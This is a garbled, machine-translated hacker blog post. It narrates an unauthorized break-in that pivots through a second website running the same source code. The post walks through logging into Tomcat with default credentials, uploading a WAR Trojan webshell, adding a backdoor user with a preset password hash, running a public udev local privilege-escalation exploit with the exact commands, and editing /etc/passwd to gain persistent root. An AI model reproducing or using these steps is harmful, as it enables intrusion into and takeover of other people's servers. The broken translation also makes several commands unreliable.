Turning Attack Tactics to deal with linux bots

It's so nice to use udev to get a linux bot today. I didn't expect my character to be so good ......

Today, I tested a website with ay520, but the website was so powerful that I didn't find any vulnerabilities. So I started a roundabout attack strategy. What is a roundabout attack? I will introduce it as follows:

When we attack a website, because we do not know the website source code structure, and there are no common vulnerabilities, we can first find some characteristic characters of the website source code, and then use google to search

Websites with the same source code as this website may have no vulnerabilities. However, the websites we found do not necessarily have any vulnerabilities. They may be configured with the above problems and then exploited them, after the shell is obtained successfully

We can use shell to view the source code of the website and then return to the target site to attack it. This is what I call a detour. Of course, it can also be the website administrator of a social engineering website on another website or on a forum.

Register the user name and password, and then return to the test target site. Then, you will be able to win the target site. After a few minutes, let's start my infiltration journey today ......

Because the target site has no vulnerabilities, the configuration of the vulnerability above is not, I found a website http://www.xxx.com with the same source code as him through google Search: 9999/wcm/loginpage.htm and then carried out a common password

Guess, but also did not find weak password and other vulnerabilities, so remove wcm and the following, direct http://www.xxx.com: 9999/results found that tomcat, the user name and password tested: admin/null

Upload the war Trojan and get the webshell running command uname-a of the website with the roundabout attack to get the kernel version of the Server Linux www.xxx.com 2.6.18-

128. el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux due to a udev local overflow vulnerability in linux 2.6 kernel, first check the webshell running permission and command

Id. As a result, uid = 0 root) gid = 0 root) groups = 0 root), 1bin), 2 daemon), 3sys), 4adm), 6 disk ), 10 wheel) context = user_u: system_r: unconfined_t, which is the root permission

Limitation. Since it is the root permission, we can use webshell to establish a user, and then use putty to connect and initiate local overflow and Elevation of Privilege ...... However, the user password added through the common useradd username

It is blank. If we want to use passwd username to set the password, our webshell cannot enter the password, and we will be depressed to use its parameter,-p to operate, search results and run the following command: useradd-

P $1 $ Bj. BPMBM $ pr3Vte2A9DW6jCzljcZNT1 liang // a string after-p is a string that I add a user to the virtual machine, and then copy his password as the password here, so that I can add a user

User liang opens putty, then enters the user name and password, connects, everything is OK, the permission is $ is a common user, the following uses udev overflow to escalate permissions.

I originally wrote according to this article overflow http://www.waitalone.cn/post/466.html results failed, after checking, may be Overflow Code problems, so I open directly

The http://www.milw0rm.com/exploits/8478 runs the following command in putty:

[Liang @ www ~] $ Vi test paste the above Code

[Liang @ www ~] $ Wq: Save and exit

[Liang @ www ~] $ Chmod 777 test: Add executable permissions for any user

[Liang @ www ~] $ Ps ax | grep udev | grep-v grep | awk {'print $ 1'} obtains the udev process number. The result is 479, and 1 is subtracted as the test parameter.

[Liang @ www ~] $ Sh test 478 returns the result

Sh-3.2 $ the returned result indicates it is unsuccessful. We will try it several times.

Sh-3.2 $ sh test 478 I tried three times, but I still cannot

Sh-3.2 $ sh test 476 succeeded this time. I saw the cute #. Haha's character exploded.

Then vi/etc/passwd changes the uid and gid of the user name liang to 0, so the liang is the root permission, haha. Work done!